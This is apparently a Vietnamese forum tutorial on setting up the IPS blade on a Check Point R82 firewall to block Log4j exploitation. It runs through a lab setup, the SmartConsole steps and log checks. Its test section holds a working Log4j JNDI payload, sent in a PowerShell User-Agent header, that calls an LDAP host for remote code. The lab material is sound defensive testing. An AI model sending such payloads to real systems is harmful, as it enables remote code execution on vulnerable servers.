Check Point NGFW Cấu hình tính năng IPS ngăn chặn các cuộc tấn công trên Check Point R82

Cấu hình IPS ngăn chặn tấn công trên Check Point R82: Thực chiến với Log4j Exploit​

IPS - Intrusion Prevention System là một trong những tính năng quan trọng của NGFW, giúp phát hiện và ngăn chặn các hành vi tấn công khai thác lỗ hổng, dò quét hoặc traffic bất thường trong hệ thống mạng.
Trong bài viết này, mình sẽ hướng dẫn cấu hình tính năng IPS trên Check Point R82 và kiểm tra thực tế bằng payload giả lập khai thác lỗ hổng Log4j.

1. Mô hình triển khai​

Mô hình lab bao gồm các thành phần chính:
Thiết bịĐịa chỉ IPVai trò
Security Management Server10.120.170.201Quản lý Gateway bằng SmartConsole
Security Gateway10.120.170.200Thiết bị firewall chặn traffic
Internet Gateway10.120.170.250Đường ra Internet/update signature
LAN Internal192.168.10.0/24Mạng nội bộ
Client PC192.168.10.10Máy Windows dùng để test

2. Các bước cấu hình trên SmartConsole​

Bước 1: Kích hoạt IPS Blade​

Trên giao diện SmartConsole, truy cập:
Gateways & Servers → Double-click vào Gateway SGW
Tại mục General Properties → Network Security, tick chọn:
Mã:
IPS
Sau đó bấm OKPublish để lưu cấu hình.
1781182069885.png


Bước 2: Cập nhật IPS Database​

IPS hoạt động dựa trên các signature/protection, vì vậy cần cập nhật database mới nhất từ ThreatCloud.
Truy cập:
Security Policies → Custom Policy Tools → Updates
Tại mục IPS, chọn:
Mã:
Update Now
Sau khi update thành công, hệ thống sẽ hiển thị trạng thái gateway đã được cập nhật.
1781182094665.png


Bước 3: Tìm kiếm IPS Protection Log4j​

Tiếp theo, truy cập:
Security Policies → Custom Policy Tools → IPS Protections
Tại thanh tìm kiếm, nhập:
Mã:
Log4j
Sau đó chọn protection:
Mã:
Apache Log4j Remote Code Execution over Non-Standard Ports
Double-click vào protection để mở phần cấu hình chi tiết.
1781136534367.png


Bước 4: Override Action sang Prevent​

Trong cửa sổ cấu hình protection, tại profile đang sử dụng, ví dụ Optimized, chọn Override settings.
Cấu hình như sau:
MụcGiá trị
ActionPrevent
TrackLog
Capture PacketsEnable
Việc bật Capture Packets giúp firewall lưu lại gói tin thô phục vụ cho việc kiểm tra và phân tích sau này.
Sau đó bấm OKClose.
1781182302425.png

1781182330624.png


Bước 5: Publish và Install Policy​

Sau khi cấu hình xong, chọn:
Mã:
Publish
Tiếp theo chọn:
Mã:
Install Policy
Tick chọn layer Threat Prevention, chọn đúng Gateway SGW - 10.120.170.200, sau đó bấm Install.
Chờ hệ thống báo trạng thái Succeeded.
1781182362998.png


3. Kiểm tra hoạt động của IPS​

Để kiểm tra IPS, mình sử dụng máy Client PC có IP 192.168.10.10 trong mạng nội bộ. Máy client đã được NAT qua Gateway để có thể truy cập Internet.
Trên máy Client, mở Windows PowerShell và chạy lệnh sau:
Mã:
Invoke-WebRequest -Uri "http://example.com" -UserAgent '${jndi:ldap://10.120.170.250/malicious_code}'
Payload trên giả lập hành vi khai thác lỗ hổng Log4j thông qua chuỗi JNDI trong HTTP Header User-Agent.

Kết quả trên máy Client​

Kết nối HTTP bị ngắt do firewall phát hiện payload độc hại và can thiệp vào phiên kết nối.
PowerShell hiển thị lỗi:
Mã:
The underlying connection was closed: An unexpected error occurred on a receive.
1781182443220.png


4. Kiểm tra log trên SmartConsole​

Quay lại SmartConsole, truy cập:
Mã:
Logs & Monitor
Tại ô tìm kiếm log, nhập:
Mã:
blade:"IPS" AND Log4j
Kết quả log hiển thị thông tin IPS đã phát hiện và chặn thành công payload Log4j.
Các thông tin cần chú ý trong log:
TrườngKết quả
BladeIPS
ActionPrevent
Protection NameApache Log4j Remote Code Execution over Non-Standard Ports
SeverityCritical
Source192.168.10.10
Packet Capture
Khi double-click vào log, có thể xem thêm chi tiết protection, source/destination và file packet capture nếu đã bật Capture Packets.
1781182708882.png


5. Kết luận​

Sau khi triển khai IPS trên Check Point R82, Gateway đã có thể phát hiện và ngăn chặn các hành vi khai thác lỗ hổng dựa trên signature.
Trong bài lab này, IPS đã chặn thành công payload giả lập khai thác Log4j và ghi nhận log đầy đủ trên SmartConsole với action là Prevent.
Một số điểm quan trọng cần kiểm tra khi cấu hình IPS:
  • Gateway phải được bật IPS Blade.
  • IPS Database cần được update thành công.
  • Protection cần được chuyển sang Prevent.
  • Phải PublishInstall Policy xuống Gateway.
  • Log phải hiển thị Blade: IPSAction: Prevent.
Chúc anh em triển khai thành công!
 

Đính kèm

  • 1781136493146.png
    1781136493146.png
    156.4 KB · Lượt xem: 0
  • 1781181970227.png
    1781181970227.png
    61.9 KB · Lượt xem: 0
Back
Top